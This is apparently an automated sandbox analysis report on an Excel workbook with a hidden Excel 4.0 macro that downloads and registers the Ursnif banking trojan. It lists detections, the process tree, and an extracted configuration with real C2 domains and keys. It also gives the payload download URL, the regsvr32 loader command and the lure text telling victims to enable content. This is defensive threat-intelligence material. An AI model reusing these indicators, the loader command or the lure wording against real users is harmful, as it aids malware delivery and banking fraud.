Analysis Report my_attach_82862.xlsb

Overview

General Information

Sample Name: my_attach_82862.xlsb
Analysis ID: 433009
MD5: 1f155a8f8c53066ef9dba8520cbcf346
SHA1: 75dda503a5f1bbb11c8de9236ff237a7989e8e80
SHA256: 29b13fa315a5249d1654221cf944f097ac4b0c42a133d07365cd3cc6afdd1a10

Detection

Hidden Macro 4.0 Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Potential thread-based time evasion detected
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Registers a DLL
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5988 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6180 cmdline: regsvr32 -s C:/Users/Public/SettingSyncY.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 6412 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6436 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5448 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5724 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5308 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5516 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6200 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6012 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: regsvr32 -s C:/Users/Public/SettingSyncY.dll, CommandLine: regsvr32 -s C:/Users/Public/SettingSyncY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5988, ProcessCommandLine: regsvr32 -s C:/Users/Public/SettingSyncY.dll, ProcessId: 6180

              Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://quickbooks.aeymotors.com/soft.dll, Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000003.00000003.285300360.0000000003010000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif (same configuration as under Malware Configuration)
Multi AV Scanner detection for domain / URL
Source: authd.feronok.com, Virustotal: Detection: 11%
Source: app.bighomegl.at, Virustotal: Detection: 6%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 50.87.220.158:443 -> 192.168.2.3:49714 version: TLS 1.2
Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: regsvr32.exe, soft[1].dll.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: C:\Users\Public\SettingSyncY.dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: soft[1].dll.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\regsvr32.exe
Source: Joe Sandbox View, ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown, DNS traffic detected: queries for: quickbooks.aeymotors.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Server: nginx, Date: Fri, 11 Jun 2021 03:07:35 GMT, Content-Type: text/html; charset=utf-8, Transfer-Encoding: chunked, Connection: close, Vary: Accept-Encoding, Content-Encoding: gzip
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/review/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerlift.acompli.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
              Source: sharedStrings.binString found in binary or memory: https://quickbooks.aeymotors.com/soft.dll
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownHTTPS traffic detected: 50.87.220.158:443 -> 192.168.2.3:49714 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              Yara detected Ursnif
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              E-Banking Fraud:

              Yara detected Ursnif
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              System Summary:

              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
              Source: Screenshot number: 4Screenshot OCR: Enable Editing 10 from the yellow bar above 11 12 13 Once You have Enable Editing, please clic
              Source: Screenshot number: 4Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT? 19 2
              Found abnormal large hidden Excel 4.0 Macro sheet
              Source: my_attach_82862.xlsbInitial sample: Sheet size: 290224
              Office process drops PE file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dll
              Writes or reads registry keys via WMI
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Writes registry values via WMI
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
              Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1EC7 NtMapViewOfSection,3_2_67CD1EC7
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1B9C GetProcAddress,NtCreateSection,memset,3_2_67CD1B9C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD2485 NtQueryVirtualMemory,3_2_67CD2485
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD22643_2_67CD2264
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D337EA3_2_67D337EA
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4F1F03_2_67D4F1F0
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4DFD23_2_67D4DFD2
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4D7C53_2_67D4D7C5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA1D403_2_67DA1D40
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D345103_2_67D34510
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D4A2163_2_67D4A216
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D472003_2_67D47200
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D3A9D33_2_67D3A9D3
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D408E53_2_67D408E5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D310103_2_67D31010
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 67D30F70 appears 31 times
              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@15/67@7/2
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C19FFCDB-9AC4-4A6F-922D-69857FBC944B} - OProcSessId.dat
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.ini
              Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:/Users/Public/SettingSyncY.dll
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2
              Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
              Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2
              Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: my_attach_82862.xlsbInitial sample: OLE zip file path = xl/media/image1.png
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
              Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: regsvr32.exe, soft[1].dll.0.dr
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1F7C LoadLibraryA,GetProcAddress,3_2_67CD1F7C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD2253 push ecx; ret 3_2_67CD2263
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD2200 push ecx; ret 3_2_67CD2209
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D30FB5 push ecx; ret 3_2_67D30FC8
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CDEBB5 pushfd ; iretd 3_2_67CDEC0C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CE0B16 pushad ; iretd 3_2_67CE0B17
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CE10D4 push 04853024h; retf 3_2_67CE10DB
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CE2807 pushad ; retf 3_2_67CE2809

              Boot Survival:

              Drops PE files to the user root directory
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dll

              Hooking and other Techniques for Hiding and Protection:

              Yara detected Ursnif
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY
              Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Potential thread-based time evasion detected
              Source: Initial fileSignature Results: Thread-based counter
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll
              Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-15598
              Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6152Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-15599
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D2DD7D _memset,IsDebuggerPresent,3_2_67D2DD7D
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D48402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,3_2_67D48402
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1F7C LoadLibraryA,GetProcAddress,3_2_67CD1F7C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA7188 mov eax, dword ptr fs:[00000030h]3_2_67DA7188
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA6CC5 push dword ptr fs:[00000030h]3_2_67DA6CC5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA70BE mov eax, dword ptr fs:[00000030h]3_2_67DA70BE
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D35139 GetProcessHeap,3_2_67D35139
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D35ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_67D35ED2
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D35EA1 SetUnhandledExceptionFilter,3_2_67D35EA1

              HIPS / PFW / Operating System Protection Evasion:

              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.233.80.31 80
              Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: app.bighomegl.at
              Source: Yara matchFile source: app.xml, type: SAMPLE
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_67CD1E8A
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_67D3E72D
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,3_2_67D3ED99
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,3_2_67D3ED13
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_67D3E538
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_67D3E4B5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_67D3E438
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,3_2_67D3E3DC
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,3_2_67D33BC0
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_67D3FA7E
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,3_2_67D3E168
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_67D3E904
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_67D3E857
              Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_67CD1144
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_67CD1F10
              Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              Yara detected Ursnif
              Source: Yara match, File source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              Remote Access Functionality:

              Yara detected Ursnif
              Source: Yara match, File source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation 2 | DLL Side-Loading 1 | Process Injection 12 | Masquerading 111 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
